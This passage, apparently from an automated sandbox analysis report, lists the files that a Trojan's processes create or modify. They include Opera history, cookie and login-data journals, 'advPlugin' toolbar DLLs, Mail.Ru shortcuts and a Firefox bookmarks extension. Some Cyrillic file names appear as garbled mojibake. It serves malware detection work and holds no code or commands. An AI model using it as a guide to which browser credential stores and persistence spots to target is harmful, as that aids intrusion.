C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\LOG (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_1E5D470765E0BE1964814B1F5A3581DC (1592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\MANIFEST-000002 (69 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\MANIFEST-000001 (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Sync Extension Settings\knohfebhibeknbfioecpdmdkjkjdnjnl\000002.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1060B7ADDE0FF6DE85637BF89FC4CEBC_17C332AE678FC2159EDCEEFD739AF1B2 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B17B.tmp (749 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\favorites.db (2555 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B178.tmp (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_HUDtRxSZxY66ieP (3980 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Favicons-journal (39586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB26.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\browser.js.new (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB14.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB01.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_hYE0nrER9U8qMAg (518 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE (1520 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1060B7ADDE0FF6DE85637BF89FC4CEBC_17C332AE678FC2159EDCEEFD739AF1B2 (1464 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension State\000001.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B179.tmp (1639 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\History (15498 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\23B523C9E7746F715D33C6527C18EB9D (1056 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\History-journal (16792 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\session.db (4517 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Login Data-journal (576 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB3C.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Jump List Icons\DB28.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_1E5D470765E0BE1964814B1F5A3581DC (471 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extension Rules\000002.dbtmp (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\BB9D.tmp (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B17C.tmp (3556 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Top Sites (304 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_QfRkedxkFJM4bh7 (646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\siteprefs.json.new (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\A7E4.tmp (755 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\ab_tests.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B175.tmp (749 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Web Data-journal (4052 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_ARKT884Jkwy8IO8 (536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\8028.tmp (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_8CA7164968F366C9A94AC8E71C4BDD9B (1504 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_xihlG2cGlsGWF7o (3980 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\session.db-journal (6355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B177.tmp (1685 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\8027.tmp (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Local Storage\chrome-extension_knohfebhibeknbfioecpdmdkjkjdnjnl_0.localstorage-journal (5109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\EF0C.tmp (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\favorites.db-journal (2493 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Cookies-journal (9804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\thumbnails.db (11355 bytes)

The process M4qMs9te1cPN.exe:4064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\netF4A0.tmp (3172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\NTUSER.DAT (13864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.lnk (1 bytes)
C:\Windows (4 bytes)
C:\Users\"%CurrentUserName%"\ntuser.dat.LOG1 (12816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ\ÃÅ¸ÃÂ¾ÃÂ¸cÃÂº ÃÂ² ÃËœÃÂ½Ã‘â€šeÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.ico (32 bytes)

The process BackgroundSingleton.exe:3692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\advPlugin\Storage.db-journal (544 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CT5DD99J.txt (87 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SRAS53O9.txt (265 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\advPlugin\Storage.db (77 bytes)

The process BackgroundSingleton.exe:3248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\advPlugin\Interfaces32.dll (159 bytes)

The process Uninstaller.exe:1732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\advPlugin\BackgroundSingleton.exe (659 bytes)

The process cscript.exe:3508 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mail.Ru.lnk (2 bytes)

The process opera_autoupdate.exe:3696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\opera_autoupdate.log (77 bytes)

The process opera_autoupdate.exe:2588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\opera_autoupdate.log (77 bytes)

The process rW6IhvkK2QUK.exe:2172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\SystemDir\nethost.exe (11518 bytes)

The process regsvr32.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\advPlugin\Toolbar32.dll (253 bytes)

The process regsvr32.exe:3180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\advPlugin\Toolbar64.dll (339 bytes)

The process bAQhdcvmXpIk.exe:3192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-7.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\menu.css (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-4.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_mosaic.jpg (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\edit-dialog.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\ffvisualbookmarks.7z (476985 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js.tmp (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\remove-dialog.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\news.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\libs\jquery-ui.js (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\05.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\application_core\jquery-core.js (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\wood_2.png (127 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\searchbar__button.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-5.jpg (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\mail.ru.jpeg (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\close.v2.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\wall.jpg (156 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\libs\suggests.js (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\mosaic.jpg (116 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\news.mail.ru.jpeg (83 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\layout.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\config\config.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\suggests.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\logo_bg.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\proto\informer.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\splash.css (29 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\fabric.jpg (140 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\themes.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\themes.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\GoMailRu.ico (14076 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\menu__item\menu__item-2.png (727 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\leather.png (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\application_core\visibleTab.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\searchbar.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\128x128.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\04.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\exchange\exchange-2.png (975 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\tabs.css (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\dialog\close.v2.png (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\10.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\11.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\google-analytics.js (712 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\11.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome.manifest (380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\MRSputnikData\install_options.xml (554 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\background\background.js (707 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Mail.Ru.url (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-11.jpg (333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\leftright.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slide__control\slide__control-edit.png (251 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\loader.gif (392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\themes__arrow-left.png (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\newtabhomepage.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\09.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\ffplugin.7z (518585 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\lib\version.js (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\loading.gif (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\libs\knockout-2.2.1.js (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-13.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\main.js (392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\themes__theme-fade-ok.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\updates.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\logo.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\icons\48.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\META-INF\manifest.mf (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\icons\16.png (586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slide__control\slide__control-delete.png (209 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\background\modules.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\07.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\06.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\informers.css (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\02.png (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\clock.png (814 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\wood.png (674 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_cookies.jpg (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\cross.png (556 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-8.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\add_button.png (569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\multiauth.gif (456 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\application_core\file-system.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\skin\vb-logo.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\sandbox\facade.js (14 bytes)
